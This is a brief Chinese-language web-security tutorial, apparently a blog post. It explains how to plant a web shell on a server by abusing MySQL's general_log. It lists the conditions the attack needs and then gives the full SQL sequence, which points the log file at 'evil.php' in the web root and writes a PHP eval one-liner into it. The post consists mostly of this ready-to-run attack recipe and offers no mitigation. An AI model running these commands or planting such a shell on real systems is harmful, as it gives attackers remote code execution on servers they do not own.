一、原理：

? ? ? ? 這也是對之前文章的補充：WEB安全--SQL注入--INTO OUTFILE-CSDN博客

????????我們可以通過修改MySQL的log文件，用select關鍵字寫入木馬文件放在服務器物理地址中，通過訪問物理地址getshell。

????????

二、條件：

? ? ? ? 用戶有寫入權限

? ? ? ? 需要知道物理路徑（絕對路徑）

????????需要能執行多行SQL語句

? ? ? ? 關閉對單引號的轉義（GPC）

三、利用方式：

show variables like '%general%';            	 # 查看配置set global general_log = on;              		 # 開啟general log模式,將所有到達MySQL Server的SQL語句記錄下來。set global general_log_file = 'D:/WWW/evil.php'; # 設置日志目錄為shell地址select '<?php eval($_GET[g]);?>'             	 # 寫入shellset global general_log=off;                  	 # 關閉general log模式